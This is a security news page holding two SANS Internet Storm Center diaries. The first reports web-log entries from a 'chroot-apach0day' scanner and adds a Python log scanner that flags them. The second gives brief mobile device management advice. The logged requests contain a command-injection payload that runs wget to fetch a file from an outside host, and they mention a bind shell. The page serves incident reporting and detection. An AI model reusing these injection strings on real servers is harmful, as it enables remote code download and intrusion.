SANS ISC Internet Storm Center
Interesting HTTP User Agent "chroot-apach0day"

Published: 2014-07-28
Last Updated: 2014-07-28 23:19:45 UTC
by Johannes Ullrich (Version: 1)
16 comment(s)

Our reader Robin submitted the following detect:

I've got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day  

The URL that appears to be retrieved does not exist, even though the domain does.

In our own web logs, we have seen a couple of similar requests:

162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"

If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day".

There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.
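As an added example (not part of the ISC diary or its logs), a small Python scanner that parses Apache combined-format lines like the ones above and flags the indicators the diary names: the "chroot-apach0day" user agent, its "BINDSHELL" variant, and the ";wget ... apach0day" query pattern. The sample log is constructed from the three lines quoted above plus one benign request; the marker names are my own.

```python
import re
from urllib.parse import unquote
# Apache "combined" log pattern; the trailing "-" field in the ISC lines is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Indicators from the diary: the user agent, its "BINDSHELL" variant, and the query
# pattern (a ";wget ..." command chain naming "apach0day" under a "DDOS" label).
UA_MARKER = "chroot-apach0day"
QUERY_MARKERS = (";wget", "apach0day", "DDOS")

def parse_line(line):
    """Return the combined-log fields as a dict, or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")  # "GET /path HTTP/1.0"
    rec["path"] = unquote(parts[1]) if len(parts) > 1 else ""  # %20 -> space
    return rec

def flag_request(rec):
    """Return the names of the indicators a parsed record matches (empty if clean)."""
    hits = []
    if UA_MARKER in rec["agent"]:
        hits.append("ua:" + UA_MARKER)
    if "BINDSHELL" in rec["agent"]:
        hits.append("ua:bindshell-marker")
    hits.extend("uri:" + mk for mk in QUERY_MARKERS if mk in rec["path"])
    return hits

def scan(lines):
    """Return (ip, timestamp, hits) for every parseable line that hits an indicator."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        hits = flag_request(rec) if rec else []
        if hits:
            findings.append((rec["ip"], rec["ts"], hits))
    return findings

# Constructed sample: the three ISC log lines quoted in the diary plus one benign request.
SAMPLE_LOG = [
    '162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"',
    '162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"',
    '162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"',
    '10.0.0.5 - - [28/Jul/2014:06:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
]
```

Running `scan(SAMPLE_LOG)` reports the three scanner requests with their matched indicators and stays silent on the benign line; feeding it a real access log gives a quick first pass before deciding whether the source IP is worth blocking.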

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Management and Control of Mobile Device Security

Published: 2014-07-28
Last Updated: 2014-07-28 01:14:06 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

When we talk about mobile devices, all boundaries are gone. Depending on where you work, it is likely that your mobile device (phone or tablet) has access to all the corporate data via wireless, in some cases with very few restrictions.

Two points to take into consideration:

- Define access control: Create one access policy that is applied to, and controls, all networks (wireless, VPN, wired).
- Use Mobile Device Management (MDM): Provide the ability to separate personal data from company data, with approved security controls for every device, whether company-owned or personal.

These changes should provide greater network visibility, allowing your organization to discover devices, measure bandwidth utilization, enforce policies, and analyze traffic patterns to monitor for anomalous activity that can drain resources.

We would like to hear from you, what is your organization currently doing to manage mobile devices in your network?

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
